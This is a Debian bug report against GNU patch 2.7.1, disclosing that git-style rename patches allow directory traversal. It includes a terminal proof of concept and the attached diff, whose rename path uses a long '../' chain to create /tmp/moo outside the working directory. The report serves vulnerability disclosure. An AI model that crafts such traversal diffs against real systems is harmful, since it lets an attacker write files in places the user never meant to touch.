Package: patch
Version: 2.7.1-7
Tags: security
patch now support git-style patches, which allows renaming files. This
feature can be abused for directory traversal. As a proof of concept,
applying the attached patch creates a file in /tmp:
$ ls /tmp/moo
/bin/ls: cannot access /tmp/moo: No such file or directory
$ mkdir empty && cd empty
$ patch -p1 < ~/traversal2.diff
patching file moo
patching file
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
(renamed from moo)
$ ls /tmp/moo
/tmp/moo
-- System Information:
Debian Release: 8.0
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages patch depends on:
ii libc6 2.19-13
--
Jakub Wilk
diff --git a/moo b/moo
new file mode 100644
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo
diff --git a/moo a/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
rename from x
rename to x
